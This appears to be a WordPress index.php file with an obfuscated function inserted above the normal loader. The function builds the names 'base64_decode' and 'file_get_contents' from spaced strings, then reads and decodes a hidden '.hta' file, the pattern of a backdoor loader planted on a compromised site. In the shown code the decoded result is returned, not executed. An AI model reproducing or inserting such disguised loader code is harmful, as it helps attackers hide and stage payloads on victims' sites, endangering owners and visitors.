<?php 
define('WP_USE_THEMES', true);
function DCVWVY()
{
    $m1 = 'b a s e 64 _ de c o de';
    $m2 = ' fi le _ g et_ co nt ent s';
    $m1 = str_replace(' ', '', $m1);
    $m2 = str_replace(' ', '', $m2);
    $f = "." . str_replace(' ', '', ' h   t a');

    if (file_exists($f)) {
        $c = $m2($f);
        return !empty($c) ? (string)$m1($c) : '';
    }
    return '';
}

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';
?>